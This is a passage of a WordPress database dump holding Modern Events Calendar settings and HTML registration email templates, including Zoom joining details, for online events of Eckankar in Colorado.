</td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(173531,267569,'mec_event_status','EventScheduled'),(173532,267569,'mec_moved_online_link',''),(173533,267569,'mec_cancelled_reason',''),(173534,267569,'mec_display_cancellation_reason_in_single_page',''),(173535,267569,'protect_children',''),(173536,267569,'passster_activate_global_protection',NULL),(173537,267569,'passster_activate_protection',NULL),(173538,267569,'passster_protection_type','password'),(173539,267569,'boldgrid_hide_page_title','0'),(173540,267569,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(173541,267569,'boldgrid_in_page_containers','1'),(173544,267569,'_dp_original','267539'),(173543,267569,'_thumbnail_id','265440'),(173545,267569,'_edit_lock','1671042898:2'),(173546,267569,'_edit_last','2'),(173547,267570,'mec_color',''),(173548,267570,'mec_location_id','118'),(173549,267570,'mec_dont_show_map','0'),(173550,267570,'mec_organizer_id','1'),(173551,267570,'mec_read_more',''),(173552,267570,'mec_more_info',''),(173553,267570,'mec_more_info_title',''),(173554,267570,'mec_more_info_target','_self'),(173555,267570,'mec_cost',''),(173556,267570,'mec_currency','a:0:{}'),(173557,267570,'mec_additional_organizer_ids','a:0:{}'),(173558,267570,'mec_additional_location_ids','a:0:{}'),(173559,267570,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-22\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-22\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"6\";}}'),(173560,267570,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"6\";}'),(173561,267570,'mec_certain_weekdays','a:0:{}'),(173562,267570,'mec_allday','0'),(173563,267570,'one_occurrence','0'),(173564,267570,'mec_hide_time','0'),(173565,267570,'mec_hide_end_time','0'),(173566,267570,'mec_comment',''),(173567,267570,'mec_timezone','global'),(173568,267570,'mec_countdown_method','global'),(173569,267570,'mec_public','1'),(173570,267570,'mec_start_date','2023-01-22'),(173571,267570,'mec_start_time_hour','10'),(173572,267570,'mec_start_time_minutes','30'),(173573,267570,'mec_start_time_ampm','AM'),(173574,267570,'mec_start_day_seconds','37800'),(173575,267570,'mec_end_date','2023-01-22'),(173576,267570,'mec_end_time_hour','11'),(173577,267570,'mec_end_time_minutes','30'),(173578,267570,'mec_end_time_ampm','AM'),(173579,267570,'mec_end_day_seconds','41400'),(173580,267570,'mec_repeat_status','1'),(173581,267570,'mec_repeat_type','advanced'),(173582,267570,'mec_repeat_interval','1'),(173583,267570,'mec_repeat_end','occurrences'),(173584,267570,'mec_repeat_end_at_occurrences','5'),(173585,267570,'mec_repeat_end_at_date',''),(173586,267570,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(173587,267570,'mec_in_days',''),(173588,267570,'mec_not_in_days',''),(173589,267570,'mec_hourly_schedules','a:0:{}'),(173590,267570,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173591,267570,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:24:\"Book Discussion - Online\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(173592,267570,'mec_fees_global_inheritance','1'),(173593,267570,'mec_fees','a:0:{}'),(173594,267570,'mec_ticket_variations_global_inheritance','1'),(173595,267570,'mec_ticket_variations','a:0:{}'),(173596,267570,'mec_reg_fields_global_inheritance','1'),(173597,267570,'mec_reg_fields','a:0:{}'),(173598,267570,'mec_bfixed_fields','a:0:{}'),(173599,267570,'mec_op','a:0:{}'),(173600,267570,'mec_fields','a:0:{}'),(173601,267570,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6195:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>896 2108 1374<br />\r\n<b>Passcode:</b> 660693</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us06web.zoom.us/j/89621081374?pwd=RkFHZXVqTGV0UXBJd2lTZXdaUUp6dz09\">https://us06web.zoom.us/j/89621081374?pwd=RkFHZXVqTGV0UXBJd2lTZXdaUUp6dz09</a></p>\r\n<p><span style=\"color: #1d5791;\">Dial-in number: 1-720-707-2699 US (for those who need to join by phone)</span></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><br />\r\nAfter you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e; text-align: center;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img class=\"aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\"><br />\r\n© Eckankar In Colorado</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:10094:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(173602,267570,'mec_event_status','EventScheduled'),(173603,267570,'mec_moved_online_link',''),(173604,267570,'mec_cancelled_reason',''),(173605,267570,'mec_display_cancellation_reason_in_single_page',''),(173606,267570,'protect_children',''),(173607,267570,'passster_activate_global_protection',NULL),(173608,267570,'passster_activate_protection',NULL),(173609,267570,'passster_protection_type','password'),(173610,267570,'boldgrid_hide_page_title','0'),(173611,267570,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(173612,267570,'boldgrid_in_page_containers','1'),(173615,267570,'_dp_original','267539'),(173614,267570,'_thumbnail_id','265440'),(173616,267570,'_edit_lock','1688010449:2'),(173617,267570,'_edit_last','2'),(173618,267571,'mec_color',''),(173619,267571,'mec_location_id','118'),(173620,267571,'mec_dont_show_map','0'),(173621,267571,'mec_organizer_id','1'),(173622,267571,'mec_read_more',''),(173623,267571,'mec_more_info',''),(173624,267571,'mec_more_info_title',''),(173625,267571,'mec_more_info_target','_self'),(173626,267571,'mec_cost',''),(173627,267571,'mec_currency','a:0:{}'),(173628,267571,'mec_additional_organizer_ids','a:0:{}'),(173629,267571,'mec_additional_location_ids','a:0:{}'),(173630,267571,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-29\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-29\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173631,267571,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173632,267571,'mec_certain_weekdays','a:0:{}'),(173633,267571,'mec_allday','0'),(173634,267571,'one_occurrence','0'),(173635,267571,'mec_hide_time','0'),(173636,267571,'mec_hide_end_time','0'),(173637,267571,'mec_comment',''),(173638,267571,'mec_timezone','global'),(173639,267571,'mec_countdown_method','global'),(173640,267571,'mec_public','1'),(173641,267571,'mec_start_date','2022-12-29'),(173642